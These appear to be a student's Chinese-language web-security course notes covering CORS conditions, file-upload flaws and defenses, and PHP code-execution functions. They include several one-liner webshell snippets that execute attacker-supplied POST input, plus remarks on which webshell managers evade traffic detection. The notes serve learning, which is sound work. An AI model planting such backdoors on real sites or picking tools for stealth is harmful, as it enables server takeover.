day28_kls

课程内容

4202年还有跨域漏洞吗

条件苛刻。浏览器会拦截。

条件:

后端跨站请求配置宽松

cookie需要是secure属性且SameSite=None

网站和攻击者都要为https

文件上传

原因

后端未做严格校验,导致用户上传恶意文件

危害

控制站点

资源耗尽

挖掘

传就完事啦

利用

上传webshell

防御

限制文件类型

限制文件大小

使用oss存储

存储与站点分离

绕过防御

php命令执行

php命令执行相关函数

eval

assert

preg_replace

1
preg_replace("/test/e",$_POST["cmd"],"jutst test");

create_function

1
$func =create_function('',$_POST['cmd']);$func();

array_map

1
2
3
4
5
$func=$_GET['func'];
$cmd=$_POST['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
echo $new_array;

array_filter

1
2
3
4
$cmd=$_POST['cmd'];
$array1=array($cmd);
$func =$_GET['func'];
array_filter($array1,$func);

php命令执行函数

system

exec

popen

php中代码执行&&命令执行函数 卿先生 博客园

webshell管理器

蚁剑

流量裸奔

哥斯拉

流量特征明显

冰蝎

流量特征基本发现不了